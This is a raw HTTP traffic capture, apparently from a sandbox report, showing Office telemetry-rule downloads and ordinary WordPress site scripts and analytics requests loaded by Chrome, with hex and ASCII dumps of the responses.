                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:09 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 448
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                              x-ms-request-id: 31698195-801e-0067-7ee6-20fe30000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180409Z-r1755647c66lljn2k9s29ch9ts00000008h000000000ask3
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              92192.168.2.649824141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC688OUTGET /wp-content/uploads/hummingbird-assets/c32f45114cc801a4d6b3b663b88bcf96.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:09 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:48 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f4-521f"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614820
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5de0f792cce-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC877INData Raw: 35 32 31 66 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 74 68 65 6d 65 2d 73 63 72 69 70 74 2c 65 63 73 5f 61 6a 61 78 5f 6c 6f 61 64 2c 73 6d 75 73 68 2d 6c 61 7a 79 2d 6c 6f 61 64 2c 6a 65 74 70 61 63 6b 2d 73 74 61 74 73 2c 65 63 73 2d 73 63 72 69 70 74 2a 2a 2f 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 73 29 7b 73 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 6d 61 74 63 68 28 2f 28 69 70 68 6f 6e 65 7c 69 70 6f 64 7c 61 6e 64 72 6f 69 64 7c 69 65 6d 6f 62 69 6c 65 29 2f 29 3b 76 61 72 20 65 3d 73 28 22 23 73 66 2d 6f
                                                                                                                                                                                                                              Data Ascii: 521f/**handles:theme-script,ecs_ajax_load,smush-lazy-load,jetpack-stats,ecs-script**/jQuery(document).ready(function(){}),function(s){s(document).ready(function(){navigator.userAgent.toLowerCase().match(/(iphone|ipod|android|iemobile)/);var e=s("#sf-o
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 6a 65 63 74 2d 6d 65 22 29 2c 53 56 47 49 6e 6a 65 63 74 6f 72 28 61 2c 7b 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 7d 29 29 2c 73 28 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 74 61 62 73 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 24 74 68 69 73 4d 65 6e 75 3d 73 28 74 68 69 73 29 2e 66 69 6e 64 28 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 73 2d 77 72 61 70 70 65 72 22 29 2c 73 28 74 68 69 73 29 2e 63 73 73 28 22 6d 69 6e 2d 68 65 69 67 68 74 22 2c 24 74 68 69 73 4d 65 6e 75 2e 68 65 69 67 68 74 28 29 2b 36 30 29 7d 29 2c 73 28 22 2e 62 67 2d 62 6c 75 65 2d 68 65 72 6f 5f 5f 74 6f 67 67 6c 65 22 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 28 22 2e 62 67 2d 62 6c 75 65 2d 68 65 72 6f 5f 5f 68 69 64 64 65 6e
                                                                                                                                                                                                                              Data Ascii: ject-me"),SVGInjector(a,{},function(e){})),s(".elementor-widget-tabs").each(function(){$thisMenu=s(this).find(".elementor-tabs-wrapper"),s(this).css("min-height",$thisMenu.height()+60)}),s(".bg-blue-hero__toggle").click(function(){s(".bg-blue-hero__hidden
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 22 2f 61 62 6f 75 74 2f 73 74 61 66 66 2d 61 66 66 69 6c 69 61 74 65 73 2d 62 6f 61 72 64 2f 22 5d 27 29 2e 70 72 6f 70 28 22 68 72 65 66 22 2c 22 2f 61 62 6f 75 74 2f 73 74 61 66 66 2d 61 66 66 69 6c 69 61 74 65 73 2d 62 6f 61 72 64 2f 23 70 70 2d 61 64 76 61 6e 63 65 64 2d 74 61 62 73 2d 74 69 74 6c 65 2d 31 36 38 33 22 29 3a 22 61 66 66 69 6c 69 61 74 65 22 3d 3d 61 26 26 73 28 27 61 5b 68 72 65 66 3d 22 2f 61 62 6f 75 74 2f 73 74 61 66 66 2d 61 66 66 69 6c 69 61 74 65 73 2d 62 6f 61 72 64 2f 22 5d 27 29 2e 70 72 6f 70 28 22 68 72 65 66 22 2c 22 2f 61 62 6f 75 74 2f 73 74 61 66 66 2d 61 66 66 69 6c 69 61 74 65 73 2d 62 6f 61 72 64 2f 23 70 70 2d 61 64 76 61 6e 63 65 64 2d 74 61 62 73 2d 74 69 74 6c 65 2d 31 36 38 32 22 29 29 2c 73 28 22 23 6d 61 69 6e
                                                                                                                                                                                                                              Data Ascii: "/about/staff-affiliates-board/"]').prop("href","/about/staff-affiliates-board/#pp-advanced-tabs-title-1683"):"affiliate"==a&&s('a[href="/about/staff-affiliates-board/"]').prop("href","/about/staff-affiliates-board/#pp-advanced-tabs-title-1682")),s("#main
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 29 2c 73 65 74 74 69 6e 67 73 3d 77 69 64 67 65 74 2e 61 74 74 72 28 22 64 61 74 61 2d 73 65 74 74 69 6e 67 73 22 29 2c 61 72 67 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 74 74 69 6e 67 73 29 2c 70 6f 73 74 73 3d 6a 51 75 65 72 79 28 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 5b 64 61 74 61 2d 69 64 3d 27 22 2b 61 72 67 73 2e 77 69 64 67 65 74 5f 69 64 2b 22 27 5d 20 2e 65 63 73 2d 70 6f 73 74 73 22 29 2c 22 6c 6f 61 64 6d 6f 72 65 22 3d 3d 61 72 67 73 2e 6c 6f 61 64 5f 6d 65 74 68 6f 64 26 26 28 62 75 74 74 6f 6e 5f 74 65 78 74 3d 6a 51 75 65 72 79 28 22 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 5b 64 61 74 61 2d 69 64 3d 27 22 2b 61 72 67 73 2e 77 69 64 67 65 74 5f 69 64 2b 22 27 5d 20 2e 65 63 73 2d 6c 6f 61 64 2d 6d 6f 72
                                                                                                                                                                                                                              Data Ascii: ),settings=widget.attr("data-settings"),args=JSON.parse(settings),posts=jQuery(".elementor-element[data-id='"+args.widget_id+"'] .ecs-posts"),"loadmore"==args.load_method&&(button_text=jQuery(".elementor-element[data-id='"+args.widget_id+"'] .ecs-load-mor
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 64 5f 6d 65 74 68 6f 64 26 26 61 6e 69 6d 61 74 69 6f 6e 2e 72 65 6d 6f 76 65 28 29 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 45 6c 65 43 75 73 74 6f 6d 53 6b 69 6e 43 68 61 6e 67 65 55 72 6c 50 61 67 65 28 65 29 7b 65 2e 63 68 61 6e 67 65 5f 75 72 6c 26 26 28 72 65 67 65 78 3d 2f 5c 2f 70 61 67 65 5c 2f 5b 30 2d 39 5d 2b 5c 2f 2f 67 6d 2c 63 75 72 72 65 6e 74 75 72 6c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2c 6e 65 77 75 72 6c 3d 63 75 72 72 65 6e 74 75 72 6c 2e 72 65 70 6c 61 63 65 28 72 65 67 65 78 2c 22 2f 22 29 2c 6e 65 77 75 72 6c 3d 6e 65 77 75 72 6c 2b 22 70 61 67 65 2f 22 2b 65 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 2b 22 2f 22 2c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 6e 65 77 75 72 6c 29 2c 68 69 73 74 6f 72 79
                                                                                                                                                                                                                              Data Ascii: d_method&&animation.remove())}})}function EleCustomSkinChangeUrlPage(e){e.change_url&&(regex=/\/page\/[0-9]+\//gm,currenturl=window.location.pathname,newurl=currenturl.replace(regex,"/"),newurl=newurl+"page/"+e.current_page+"/",console.log(newurl),history
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 7c 21 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 63 66 67 3a 69 2c 6e 6f 53 75 70 70 6f 72 74 3a 21 30 7d 3b 76 61 72 20 72 3d 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 6f 3d 65 2e 48 54 4d 4c 50 69 63 74 75 72 65 45 6c 65 6d 65 6e 74 2c 73 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 2c 6c 3d 22 67 65 74 41 74 74 72 69 62 75 74 65 22 2c 63 3d 65 5b 73 5d 2e 62 69 6e 64 28 65 29 2c 64 3d 65 2e 73 65 74 54 69 6d 65 6f 75 74 2c 75 3d 65 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 64 2c 66 3d 65 2e 72 65 71 75 65 73 74 49 64 6c 65 43 61 6c 6c 62 61 63 6b 2c 6d 3d 2f 5e 70 69 63 74 75 72 65 24 2f 69 2c
                                                                                                                                                                                                                              Data Ascii: |!t.getElementsByClassName)return{init:function(){},cfg:i,noSupport:!0};var r=t.documentElement,o=e.HTMLPictureElement,s="addEventListener",l="getAttribute",c=e[s].bind(e),d=e.setTimeout,u=e.requestAnimationFrame||d,f=e.requestIdleCallback,m=/^picture$/i,
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 28 74 2e 68 69 64 64 65 6e 3f 64 3a 75 29 28 43 65 29 29 29 7d 2c 41 65 2e 5f 6c 73 46 6c 75 73 68 3d 43 65 2c 41 65 29 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 77 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 77 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 29 29 7d 7d 2c 4e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 61 3d 30 2c 72 3d 69 2e 74 68 72 6f 74 74 6c 65 44 65 6c 61 79 2c 6f 3d 69 2e 72 69 63 54 69 6d 65 6f 75 74 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 3d 21 31 2c 61 3d 6e 2e 6e 6f 77 28 29 2c 65 28 29 7d 2c 6c 3d 66 26 26 6f 3e 34 39 3f 66 75 6e 63 74 69
                                                                                                                                                                                                                              Data Ascii: (t.hidden?d:u)(Ce)))},Ae._lsFlush=Ce,Ae),M=function(e,t){return t?function(){w(e)}:function(){var t=this,n=arguments;w((function(){e.apply(t,n)}))}},N=function(e){var t,a=0,r=i.throttleDelay,o=i.ricTimeout,s=function(){t=!1,a=n.now(),e()},l=f&&o>49?functi
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 28 64 3d 59 29 2c 76 7c 7c 28 76 3d 21 69 2e 65 78 70 61 6e 64 7c 7c 69 2e 65 78 70 61 6e 64 3c 31 3f 72 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 3e 35 30 30 26 26 72 2e 63 6c 69 65 6e 74 57 69 64 74 68 3e 35 30 30 3f 35 30 30 3a 33 37 30 3a 69 2e 65 78 70 61 6e 64 2c 61 2e 5f 64 65 66 45 78 3d 76 2c 79 3d 76 2a 69 2e 65 78 70 46 61 63 74 6f 72 2c 67 3d 69 2e 68 46 61 63 2c 4a 3d 6e 75 6c 6c 2c 59 3c 79 26 26 5a 3c 31 26 26 65 65 3e 32 26 26 44 3e 32 26 26 21 74 2e 68 69 64 64 65 6e 3f 28 59 3d 79 2c 65 65 3d 30 29 3a 59 3d 44 3e 31 26 26 65 65 3e 31 26 26 5a 3c 36 3f 76 3a 58 29 2c 6d 21 3d 3d 64 26 26 28 24 3d 69 6e 6e 65 72 57 69 64 74 68 2b 64 2a 67 2c 71 3d 69 6e 6e 65 72 48 65 69 67 68 74 2b 64 2c 75 3d 2d 31 2a 64 2c 6d 3d 64 29 2c 6f 3d 70 5b 6e 5d
                                                                                                                                                                                                                              Data Ascii: (d=Y),v||(v=!i.expand||i.expand<1?r.clientHeight>500&&r.clientWidth>500?500:370:i.expand,a._defEx=v,y=v*i.expFactor,g=i.hFac,J=null,Y<y&&Z<1&&ee>2&&D>2&&!t.hidden?(Y=y,ee=0):Y=D>1&&ee>1&&Z<6?v:X),m!==d&&($=innerWidth+d*g,q=innerHeight+d,u=-1*d,m=d),o=p[n]
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 6c 61 73 73 29 2c 76 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6b 29 2c 6b 3d 64 28 74 65 2c 32 35 30 30 29 2c 62 28 65 2c 6c 65 2c 21 30 29 29 2c 75 26 26 67 2e 63 61 6c 6c 28 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 6f 75 72 63 65 22 29 2c 64 65 29 2c 73 3f 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 73 65 74 22 2c 73 29 3a 6f 26 26 21 75 26 26 28 51 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 3f 63 65 28 65 2c 6f 29 3a 65 2e 73 72 63 3d 6f 29 2c 72 26 26 28 73 7c 7c 75 29 26 26 41 28 65 2c 7b 73 72 63 3a 6f 7d 29 29 2c 65 2e 5f 6c 61 7a 79 52 61 63 65 26 26 64 65 6c 65 74 65 20 65 2e 5f 6c 61 7a 79 52 61 63 65 2c 68 28 65 2c 69 2e 6c 61 7a 79 43 6c 61 73 73 29 2c 77 28 28 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                              Data Ascii: lass),v&&(clearTimeout(k),k=d(te,2500),b(e,le,!0)),u&&g.call(c.getElementsByTagName("source"),de),s?e.setAttribute("srcset",s):o&&!u&&(Q.test(e.nodeName)?ce(e,o):e.src=o),r&&(s||u)&&A(e,{src:o})),e._lazyRace&&delete e._lazyRace,h(e,i.lazyClass),w((functio
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC1369INData Raw: 6e 73 65 72 74 65 64 22 2c 72 65 2c 21 30 29 2c 72 5b 73 5d 28 22 44 4f 4d 41 74 74 72 4d 6f 64 69 66 69 65 64 22 2c 72 65 2c 21 30 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 72 65 2c 39 39 39 29 29 2c 63 28 22 68 61 73 68 63 68 61 6e 67 65 22 2c 72 65 2c 21 30 29 2c 5b 22 66 6f 63 75 73 22 2c 22 6d 6f 75 73 65 6f 76 65 72 22 2c 22 63 6c 69 63 6b 22 2c 22 6c 6f 61 64 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 22 61 6e 69 6d 61 74 69 6f 6e 65 6e 64 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 5b 73 5d 28 65 2c 72 65 2c 21 30 29 7d 29 29 2c 2f 64 24 7c 5e 63 2f 2e 74 65 73 74 28 74 2e 72 65 61 64 79 53 74 61 74 65 29 3f 79 65 28 29 3a 28 63 28 22 6c 6f 61 64 22 2c 79 65 29 2c 74 5b 73 5d 28 22 44 4f 4d 43 6f 6e 74 65
                                                                                                                                                                                                                              Data Ascii: nserted",re,!0),r[s]("DOMAttrModified",re,!0),setInterval(re,999)),c("hashchange",re,!0),["focus","mouseover","click","load","transitionend","animationend"].forEach((function(e){t[s](e,re,!0)})),/d$|^c/.test(t.readyState)?ye():(c("load",ye),t[s]("DOMConte


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              93192.168.2.64982513.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:09 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 416
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                              x-ms-request-id: b92258e0-a01e-00ab-2aab-219106000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180409Z-r1755647c66nxct5p0gnwngmx000000007u0000000007eym
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              94192.168.2.64982313.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:09 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 491
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                              x-ms-request-id: b6b4fe6b-401e-008c-805d-2386c2000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180409Z-17fbfdc98bbnpjstwqrbe0re7n000000060000000000armd
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              95192.168.2.649826169.150.247.374431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC353OUTGET /analytics.js HTTP/1.1
                                                                                                                                                                                                                              Host: stats.wpmucdn.com
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:09 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:09 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Content-Length: 70428
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Server: BunnyCDN-DE1-1080
                                                                                                                                                                                                                              CDN-PullZone: 1121147
                                                                                                                                                                                                                              CDN-Uid: 778bbc1f-fc99-4e43-843d-a54ddaa69624
                                                                                                                                                                                                                              CDN-RequestCountryCode: US
                                                                                                                                                                                                                              Cache-Control: public, max-age=86400
                                                                                                                                                                                                                              ETag: "65e9b379-1131c"
                                                                                                                                                                                                                              Last-Modified: Thu, 07 Mar 2024 12:30:49 GMT
                                                                                                                                                                                                                              CDN-ProxyVer: 1.04
                                                                                                                                                                                                                              CDN-RequestPullSuccess: True
                                                                                                                                                                                                                              CDN-RequestPullCode: 200
                                                                                                                                                                                                                              CDN-CachedAt: 10/18/2024 21:38:21
                                                                                                                                                                                                                              CDN-EdgeStorageId: 1079
                                                                                                                                                                                                                              CDN-Status: 200
                                                                                                                                                                                                                              CDN-RequestTime: 0
                                                                                                                                                                                                                              CDN-RequestId: 5540525aaba3326de840a3535c22bcb4
